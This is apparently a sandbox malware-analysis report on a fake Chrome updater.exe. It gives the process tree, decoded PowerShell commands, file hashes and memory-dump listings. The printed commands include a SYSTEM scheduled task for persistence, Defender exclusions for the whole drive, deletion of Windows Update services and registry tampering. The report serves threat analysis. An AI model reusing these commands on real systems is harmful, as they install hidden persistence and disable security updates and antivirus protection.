C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
Process (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdQBoACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAVQBBAGIAdwBBAGoAQQBEADQAQQBJAEEAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAEwAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBJAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEgATQBBAFgAQQBCAEgAQQBHADgAQQBiAHcAQgBuAEEARwB3AEEAWgBRAEIAYwBBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEARgB3AEEAZABRAEIAdwBBAEcAUQBBAFkAUQBCADAAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAZQBBAEIAcQBBAEcAUQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBsAHIAbQByACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAagB1AGkAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB2AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAHgAYQB6ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgA0AGEAZAA4ADQAMgAwAGMAYQA2AGUAMgA1AGQAZQA5AGUAOQA4ADQAMwAxAGIANwAyADIAZgA3ADEAZQA2ADIAOQA1ADcAMABkADkAMQBiADgANQA2ADAANQBmADkAOABhADUAMQA0AGEANQAwADcAMwA2AGEAZABiAGIAYwAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAYQBuAHcAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHAAYQBrAGQAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
Decoded command (UTF-16LE base64; the <#...#> fragments are empty PowerShell block comments used as filler): <#puh#> Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'powershell' -Argument '-EncodedCommand "<nested base64, identical to the depth-1 powershell.EXE command line below; it decodes to: <#uo#> Start-Process -FilePath 'C:\Program Files\Google\Chrome\updater.exe' -Verb RunAs <#xjd#>>"') <#lrmr#> -Trigger (New-ScheduledTaskTrigger -AtStartup) <#jui#> -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) <#vu#> -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force <#sxaz#>; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe' -Destination 'C:\Program Files\Google\Chrome\updater.exe' -Force <#eanw#>; Start-ScheduledTask <#pakd#> -TaskName 'GoogleUpdateTaskMachineQC';
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

Process (depth 1): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHUAbwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAeABqAGQAIwA+AA=="
Decoded command (UTF-16LE base64): <#uo#> Start-Process -FilePath 'C:\Program Files\Google\Chrome\updater.exe' -Verb RunAs <#xjd#>
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses

Process (depth 2): C:\Program Files\Google\Chrome\updater.exe
Command line: "C:\Program Files\Google\Chrome\updater.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger

Process (depth 3): C:\Windows\System32\conhost.exe
Command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses

Process (depth 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="
Decoded command (UTF-16LE base64): <#alx#> Add-MpPreference <#ki#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#qh#> -Force <#aiyn#>
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses

Process (depth 4): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Process (depth 5): C:\Windows\system32\sc.exe
Command line: sc stop UsoSvc
- Launches sc.exe

Process (depth 5): C:\Windows\system32\sc.exe
Command line: sc stop WaaSMedicSvc
- Launches sc.exe

Process (depth 5): C:\Windows\system32\sc.exe
Command line: sc stop wuauserv
- Launches sc.exe

Process (depth 5): C:\Windows\system32\sc.exe
Command line: sc stop bits
- Launches sc.exe

Process (depth 5): C:\Windows\system32\sc.exe
Command line: sc stop dosvc
- Launches sc.exe

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\takeown.exe
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions

Process (depth 5): C:\Windows\system32\icacls.exe
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

Process (depth 5): C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

Process (depth 5): C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Process (depth 4): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

Process (depth 5): C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-ac 0

Process (depth 5): C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-dc 0

Process (depth 5): C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-ac 0

Process (depth 5): C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-dc 0

Process (depth 4): C:\Windows\System32\conhost.exe
Command line: C:\Windows\System32\conhost.exe "ksvudlgzwxvyjy"

Process (depth 4): C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe ludkbupigbltzfui1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Ux1mQQil7sp+RmWIA87i6XioWLBkWXEpGDqawTe1Tn4
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Program Files\Google\Chrome\updater.exe
  Filesize: 7.2MB
  MD5: 39a2104f5c1096d1c9481cbf5203a820
  SHA1: 17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34
  SHA256: b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc
  SHA512: 7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 5b2a930376be1a4edd8ebd8e6ae8875f
  SHA1: ab52636788bd2c097c729b8b5098e1d57a3eb2ca
  SHA256: 3796e7170d3e3e2c728a58d4e38570c110f2887114bccc971e0db4b67f8498c1
  SHA512: b57b8b91d7588dd8ce70ed11a9f2c8ce64b9ea33392009348550773650764a0e2a3f0f2386c394cdae08f503ae51c86844ef8390aab684423a88f19f4d9bd72e

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 5d574dc518025fad52b7886c1bff0e13
  SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
  SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
  SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: e2d46bffd1d9300639cac360fac02cb4
  SHA1: fd2b4813c8ab610294b6759192ca05bad5bb8958
  SHA256: 94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
  SHA512: 54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535

C:\Windows\system32\drivers\etc\hosts
  Filesize: 2KB
  MD5: c5227366b7a688ff23b01788718251aa
  SHA1: 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
  SHA256: 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
  SHA512: 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
memory/60-227-0x0000000000000000-mapping.dmp
memory/164-177-0x0000000000000000-mapping.dmp
memory/164-477-0x0000020D19690000-0x0000020D19697000-memory.dmp (Filesize: 28KB)
memory/164-455-0x0000020D19DC0000-0x0000020D19DC6000-memory.dmp (Filesize: 24KB)
memory/200-176-0x0000000000000000-mapping.dmp
memory/208-444-0x0000000000000000-mapping.dmp
memory/320-475-0x0000000000000000-mapping.dmp
memory/416-474-0x0000000000000000-mapping.dmp
memory/420-225-0x0000000000000000-mapping.dmp
memory/492-271-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/492-270-0x00007FF816FA0000-0x00007FF81717B000-memory.dmp (Filesize: 1.9MB)
memory/492-269-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/492-268-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/492-265-0x0000000000000000-mapping.dmp
memory/496-190-0x0000000000000000-mapping.dmp
memory/708-131-0x0000000000000000-mapping.dmp
memory/708-140-0x000002C2A61F0000-0x000002C2A6266000-memory.dmp (Filesize: 472KB)
memory/708-136-0x000002C2A5F20000-0x000002C2A5F42000-memory.dmp (Filesize: 136KB)
memory/876-189-0x0000000000000000-mapping.dmp
memory/1016-432-0x0000000000000000-mapping.dmp
memory/1184-437-0x0000000000000000-mapping.dmp
memory/1204-476-0x0000000000000000-mapping.dmp
memory/1272-441-0x0000000000000000-mapping.dmp
memory/1324-440-0x0000000000000000-mapping.dmp
memory/1384-175-0x0000000000000000-mapping.dmp
memory/1416-236-0x0000000000000000-mapping.dmp
memory/1536-471-0x0000000000000000-mapping.dmp
memory/1620-439-0x0000000000000000-mapping.dmp
memory/1620-228-0x0000000000000000-mapping.dmp
memory/1776-480-0x0000000000000000-mapping.dmp
memory/1892-187-0x0000000000000000-mapping.dmp
memory/1892-472-0x0000000000000000-mapping.dmp
memory/1916-184-0x0000000000000000-mapping.dmp
memory/1968-191-0x0000000000000000-mapping.dmp
memory/1968-438-0x0000000000000000-mapping.dmp
memory/2136-179-0x0000000000000000-mapping.dmp
memory/2136-241-0x0000000000000000-mapping.dmp
memory/2144-124-0x00000230F65C0000-0x00000230F69DE000-memory.dmp (Filesize: 4.1MB)
memory/2144-123-0x00000230F35E0000-0x00000230F39FE000-memory.dmp (Filesize: 4.1MB)
memory/2148-306-0x00000245D3110000-0x00000245D31C9000-memory.dmp (Filesize: 740KB)
memory/2148-282-0x0000000000000000-mapping.dmp
memory/2148-300-0x00000245D2A70000-0x00000245D2A8C000-memory.dmp (Filesize: 112KB)
memory/2148-340-0x00000245D2A60000-0x00000245D2A6A000-memory.dmp (Filesize: 40KB)
memory/2204-238-0x0000000000000000-mapping.dmp
memory/2204-445-0x0000000000000000-mapping.dmp
memory/2212-237-0x0000000000000000-mapping.dmp
memory/2216-182-0x0000000000000000-mapping.dmp
memory/2428-174-0x0000000000000000-mapping.dmp
memory/2560-447-0x0000000000000000-mapping.dmp
memory/2560-180-0x0000000000000000-mapping.dmp
memory/2688-473-0x0000000000000000-mapping.dmp
memory/2696-442-0x0000000000000000-mapping.dmp
memory/2700-448-0x0000000000000000-mapping.dmp
memory/2796-186-0x0000000000000000-mapping.dmp
memory/2800-470-0x0000000000000000-mapping.dmp
memory/2952-461-0x0000000000000000-mapping.dmp
memory/3004-181-0x0000000000000000-mapping.dmp
memory/3116-460-0x0000000000000000-mapping.dmp
memory/3256-483-0x0000000140000000-0x0000000140809000-memory.dmp (Filesize: 8.0MB)
memory/3256-464-0x0000000140000000-0x0000000140809000-memory.dmp (Filesize: 8.0MB)
memory/3256-467-0x0000000140000000-0x0000000140809000-memory.dmp (Filesize: 8.0MB)
memory/3256-478-0x0000000140000000-0x0000000140809000-memory.dmp (Filesize: 8.0MB)
memory/3256-468-0x0000000000530000-0x0000000000550000-memory.dmp (Filesize: 128KB)
memory/3256-466-0x0000000140000000-0x0000000140809000-memory.dmp (Filesize: 8.0MB)
memory/3256-465-0x000000014036EAC4-mapping.dmp
memory/3304-482-0x0000000000000000-mapping.dmp
memory/3520-188-0x0000000000000000-mapping.dmp
memory/3520-431-0x0000000000000000-mapping.dmp
memory/3608-479-0x0000000000000000-mapping.dmp
memory/3608-224-0x0000000000000000-mapping.dmp
memory/3628-453-0x0000000000000000-mapping.dmp
memory/3720-462-0x0000000000000000-mapping.dmp
memory/3744-235-0x0000000000000000-mapping.dmp
memory/3760-433-0x0000000000000000-mapping.dmp
memory/3760-193-0x0000000000000000-mapping.dmp
memory/3788-185-0x0000000000000000-mapping.dmp
memory/3864-194-0x0000000000000000-mapping.dmp
memory/3896-117-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/3896-114-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/3896-116-0x0000000000400000-0x00000000010B6000-memory.dmp (Filesize: 12.7MB)
memory/3896-120-0x00007FF816FA0000-0x00007FF81717B000-memory.dmp (Filesize: 1.9MB)
memory/3896-115-0x00007FF816FA0000-0x00007FF81717B000-memory.dmp (Filesize: 1.9MB)
memory/3948-446-0x00000259CC650000-0x00000259CC662000-memory.dmp (Filesize: 72KB)
memory/3948-443-0x00000259B34B0000-0x00000259B34B6000-memory.dmp (Filesize: 24KB)
memory/3996-192-0x0000000000000000-mapping.dmp
memory/4040-234-0x0000000000000000-mapping.dmp
memory/4048-226-0x0000000000000000-mapping.dmp
memory/4060-481-0x0000000000000000-mapping.dmp
memory/4084-463-0x0000000000000000-mapping.dmp